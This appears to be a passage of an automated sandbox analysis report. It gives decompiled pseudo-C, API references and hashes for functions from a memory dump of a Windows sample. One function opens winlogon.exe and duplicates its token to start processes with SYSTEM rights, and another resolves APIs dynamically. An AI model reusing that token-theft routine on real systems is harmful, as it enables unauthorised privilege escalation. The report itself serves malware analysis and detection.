                                                                                                                                                                  0x004062ab
                                                                                                                                                                  0x004062ad
                                                                                                                                                                  0x004062b0
                                                                                                                                                                  0x004062c3
                                                                                                                                                                  0x004062c3
                                                                                                                                                                  0x004062d3
                                                                                                                                                                  0x004062da
                                                                                                                                                                  0x004062f1
                                                                                                                                                                  0x004062f7
                                                                                                                                                                  0x004062fe
                                                                                                                                                                  0x0040630d
                                                                                                                                                                  0x00406312
                                                                                                                                                                  0x0040631e
                                                                                                                                                                  0x00406327
                                                                                                                                                                  0x00406275
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406285
                                                                                                                                                                  0x00406287
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406277
                                                                                                                                                                  0x0040627a
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040627a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406273
                                                                                                                                                                  0x00406224
                                                                                                                                                                  0x00406224
                                                                                                                                                                  0x00406229
                                                                                                                                                                  0x0040622a
                                                                                                                                                                  0x0040622f
                                                                                                                                                                  0x00406236
                                                                                                                                                                  0x0040623c
                                                                                                                                                                  0x00406243
                                                                                                                                                                  0x00406245
                                                                                                                                                                  0x00406247
                                                                                                                                                                  0x00406248
                                                                                                                                                                  0x0040624b
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x0040632d
                                                                                                                                                                  0x00406334

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                  • memset.MSVCRT ref: 004062DA
                                                                                                                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                  0x0040920a
                                                                                                                                                                  0x00409218
                                                                                                                                                                  0x00409223
                                                                                                                                                                  0x0040922c
                                                                                                                                                                  0x0040924b
                                                                                                                                                                  0x00409253
                                                                                                                                                                  0x0040929b
                                                                                                                                                                  0x004092e4
                                                                                                                                                                  0x0040929d
                                                                                                                                                                  0x004092a3
                                                                                                                                                                  0x004092b1
                                                                                                                                                                  0x004092bd
                                                                                                                                                                  0x004092cc
                                                                                                                                                                  0x004092d1
                                                                                                                                                                  0x004092d8
                                                                                                                                                                  0x004092dd
                                                                                                                                                                  0x00409255
                                                                                                                                                                  0x0040925b
                                                                                                                                                                  0x00409269
                                                                                                                                                                  0x00409275
                                                                                                                                                                  0x00409282
                                                                                                                                                                  0x0040928d
                                                                                                                                                                  0x00409292
                                                                                                                                                                  0x004092ec
                                                                                                                                                                  0x004092ef
                                                                                                                                                                  0x004092ef
                                                                                                                                                                  0x00409231
                                                                                                                                                                  0x00409232
                                                                                                                                                                  0x00409233
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409239
                                                                                                                                                                  0x0040921a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                  • memset.MSVCRT ref: 00409269
                                                                                                                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                  • memset.MSVCRT ref: 004092B1
                                                                                                                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                                                                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                                                                  0x00409c73
                                                                                                                                                                  0x00409c7c
                                                                                                                                                                  0x00409c90
                                                                                                                                                                  0x00409c9f
                                                                                                                                                                  0x00409ca2
                                                                                                                                                                  0x00409ca7
                                                                                                                                                                  0x00409ca9
                                                                                                                                                                  0x00409cb1
                                                                                                                                                                  0x00409cc0
                                                                                                                                                                  0x00409cc2
                                                                                                                                                                  0x00409cc7
                                                                                                                                                                  0x00409ccf
                                                                                                                                                                  0x00409cd0
                                                                                                                                                                  0x00409cd7
                                                                                                                                                                  0x00409cd8
                                                                                                                                                                  0x00409cd9
                                                                                                                                                                  0x00409cda
                                                                                                                                                                  0x00409cdc
                                                                                                                                                                  0x00409ce0
                                                                                                                                                                  0x00409ce1
                                                                                                                                                                  0x00409ce9
                                                                                                                                                                  0x00409cf1
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409d08
                                                                                                                                                                  0x00409d08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d0d
                                                                                                                                                                  0x00409d0f

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                  • API String ID: 1027343248-2054640941
                                                                                                                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                                                                  0x00401e59
                                                                                                                                                                  0x00401e5c
                                                                                                                                                                  0x00401e64
                                                                                                                                                                  0x00401e67
                                                                                                                                                                  0x00401ef9
                                                                                                                                                                  0x00401e6d
                                                                                                                                                                  0x00401e70
                                                                                                                                                                  0x00401e76
                                                                                                                                                                  0x00401e79
                                                                                                                                                                  0x00401e7e
                                                                                                                                                                  0x00401e83
                                                                                                                                                                  0x00401e92
                                                                                                                                                                  0x00401e85
                                                                                                                                                                  0x00401e8e
                                                                                                                                                                  0x00401e8e
                                                                                                                                                                  0x00401e96
                                                                                                                                                                  0x00401ee6
                                                                                                                                                                  0x00401e98
                                                                                                                                                                  0x00401e9b
                                                                                                                                                                  0x00401e9e
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401ea8
                                                                                                                                                                  0x00401ebb
                                                                                                                                                                  0x00401eaa
                                                                                                                                                                  0x00401eb7
                                                                                                                                                                  0x00401eb7
                                                                                                                                                                  0x00401ebf
                                                                                                                                                                  0x00401ed3
                                                                                                                                                                  0x00401ec1
                                                                                                                                                                  0x00401ec7
                                                                                                                                                                  0x00401ec9
                                                                                                                                                                  0x00401ec9
                                                                                                                                                                  0x00401ed8
                                                                                                                                                                  0x00401ed8
                                                                                                                                                                  0x00401eeb
                                                                                                                                                                  0x00401eeb
                                                                                                                                                                  0x00401f01

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                  • String ID: winlogon.exe
                                                                                                                                                                  • API String ID: 1315556178-961692650
                                                                                                                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                                  0x00405241
                                                                                                                                                                  0x00405250
                                                                                                                                                                  0x00405257
                                                                                                                                                                  0x0040525f
                                                                                                                                                                  0x00405262
                                                                                                                                                                  0x00405265
                                                                                                                                                                  0x00405268
                                                                                                                                                                  0x0040526f
                                                                                                                                                                  0x0040526f
                                                                                                                                                                  0x00405277
                                                                                                                                                                  0x00405277
                                                                                                                                                                  0x0040527a
                                                                                                                                                                  0x0040527f
                                                                                                                                                                  0x00405284
                                                                                                                                                                  0x00405285
                                                                                                                                                                  0x00405291
                                                                                                                                                                  0x00405296
                                                                                                                                                                  0x004052a9
                                                                                                                                                                  0x004052b3
                                                                                                                                                                  0x004052b7
                                                                                                                                                                  0x004052bc
                                                                                                                                                                  0x004052ca
                                                                                                                                                                  0x004052d2
                                                                                                                                                                  0x004052d5
                                                                                                                                                                  0x004052d8
                                                                                                                                                                  0x004052d8
                                                                                                                                                                  0x004052db
                                                                                                                                                                  0x004052db
                                                                                                                                                                  0x004052e1
                                                                                                                                                                  0x004052e4
                                                                                                                                                                  0x004052e8
                                                                                                                                                                  0x004052f2

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                  • API String ID: 3979103747-1363028141
                                                                                                                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                                                                  0x00407639
                                                                                                                                                                  0x00407646
                                                                                                                                                                  0x00407647
                                                                                                                                                                  0x00407654
                                                                                                                                                                  0x0040765f
                                                                                                                                                                  0x0040765f
                                                                                                                                                                  0x0040766b
                                                                                                                                                                  0x0040766d
                                                                                                                                                                  0x00407672
                                                                                                                                                                  0x00407677
                                                                                                                                                                  0x0040767d
                                                                                                                                                                  0x00407680
                                                                                                                                                                  0x00407686
                                                                                                                                                                  0x00407691
                                                                                                                                                                  0x00407697
                                                                                                                                                                  0x00407699
                                                                                                                                                                  0x00407699
                                                                                                                                                                  0x0040769c
                                                                                                                                                                  0x0040769f
                                                                                                                                                                  0x004076a3
                                                                                                                                                                  0x004076a7
                                                                                                                                                                  0x004076ab
                                                                                                                                                                  0x004076b5
                                                                                                                                                                  0x004076be
                                                                                                                                                                  0x004076c8
                                                                                                                                                                  0x004076de
                                                                                                                                                                  0x004076ee
                                                                                                                                                                  0x004076f1
                                                                                                                                                                  0x004076f4
                                                                                                                                                                  0x004076fa
                                                                                                                                                                  0x00407708
                                                                                                                                                                  0x0040770e
                                                                                                                                                                  0x00407718
                                                                                                                                                                  0x0040771d
                                                                                                                                                                  0x00407723
                                                                                                                                                                  0x00407724
                                                                                                                                                                  0x00407727
                                                                                                                                                                  0x0040772c
                                                                                                                                                                  0x0040772f
                                                                                                                                                                  0x00407734
                                                                                                                                                                  0x0040773f
                                                                                                                                                                  0x00407744
                                                                                                                                                                  0x00407745
                                                                                                                                                                  0x0040767d
                                                                                                                                                                  0x00407760

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
